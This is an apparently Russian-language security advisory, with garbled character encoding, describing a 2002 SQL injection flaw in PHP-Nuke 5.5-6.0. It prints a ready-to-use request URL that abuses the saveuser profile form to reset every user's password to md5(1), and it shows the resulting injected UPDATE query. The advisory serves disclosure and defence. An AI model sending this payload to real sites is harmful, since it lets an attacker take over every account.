»зменение SQL запроса в PHP-Nuke

ƒата публикации:
04.11.2002
ƒата изменени€:
17.10.2006
¬сего просмотров:
1655
ќпасность:
Ќаличие исправлени€:
 оличество у€звимостей:
1
CVSSv2 рейтинг:
CVE ID:
Ќет данных
¬ектор эксплуатации:
¬оздействие:
CWE ID:
Ќет данных
Ќаличие эксплоита:
Ќет данных
”€звимые продукты:
ќписание: PHP-Nuke Ц система управлени€ контентом, написанна€ на PHP.

PHP-Nuke у€звим к нападению SQL injection, котора€ позвол€ет атакующему измен€ть существующий SQL запрос и модифицировать информацию в базе данных. —ледующий пример изменит все пароли пользователей PHP-Nuke на С1Т. Ёксплуатаци€ требует, чтобы атакующий вошел в систему и определил свой UID, просматрива€ код страницы. ≈сли UID атакующего равен 2, то он может начать нападение, запрашива€ следующий URL:

modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage= no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/*

¬веденный запрос построен следующим образом:

 
PDATE nuke_users
   SET name         = '',
       email        = '',
       femail       = '',
       url          = 'http://',
       pass         = 'xxxxx',
  +--[ bio          = '\',
  |    user_avatar  = '',
  |    user_icq     = '',
  |    user_occ     = '',
  |    user_from    = '',
  |    user_intrest = '',
  |    user_sig     = '',
  |    user_aim     = '',
  |    user_yim     = '',
  |    user_msnm    = '',
  +--[ newsletter   = ',
       bio=0,pass=md5(1)/*' WHERE uid='2'
у€звимость обнаружена в PHP-Nuke 5.5-6.0

—сылки: iDEFENSE Security Advisory 10.31.02c: PHP-Nuke SQL Injection Vulnerability
или введите им€

CAPTCHA